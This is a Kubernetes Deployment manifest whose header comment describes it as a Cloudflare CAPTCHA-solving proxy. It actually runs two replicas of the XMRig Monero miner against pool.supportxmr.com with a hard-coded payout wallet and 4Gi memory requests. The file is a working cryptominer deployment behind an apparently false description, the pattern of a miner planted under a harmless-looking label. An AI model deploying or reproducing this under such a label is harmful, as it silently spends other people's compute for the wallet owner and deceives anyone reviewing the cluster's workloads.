deployment-xmrig.yaml
## This is a proxy that solves Cloudflare's CAPTCHA challenge for automated services
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: xmrig
  labels:
    app.kubernetes.io/name: xmrig
  annotations:
    polaris.fairwinds.com/tagNotSpecified-exempt: true  # Latest tag is desired here
spec:
  selector:
    matchLabels:
      app.kubernetes.io/name: xmrig
  replicas: 2
  template:
    metadata:
      labels:
        app.kubernetes.io/name: xmrig
    spec:
      affinity:
        podAntiAffinity:
          preferredDuringSchedulingIgnoredDuringExecution:
          - podAffinityTerm:
              labelSelector:
                matchLabels:
                  name: xmrig
              topologyKey: kubernetes.io/hostname
            weight: 100
      containers:
        - name: xmrig
          image: miningcontainers/xmrig:latest
          args:
            - "-k"
            - "--tls"
            - "-o"
            - "pool.supportxmr.com:443"
            - "-u"
            - "47TWgJVGf9qTNZhtrm9BiEek8d6k7AXuaFd5SF7bwA8A1ujXq39ngESUm1cwJu6H91fVAtebVHUuYXs7VCBp8MLKHAF4Eho"
          resources:
            requests:
              memory: "4Gi"
              cpu: "250m"
            limits:
              memory: "4Gi"
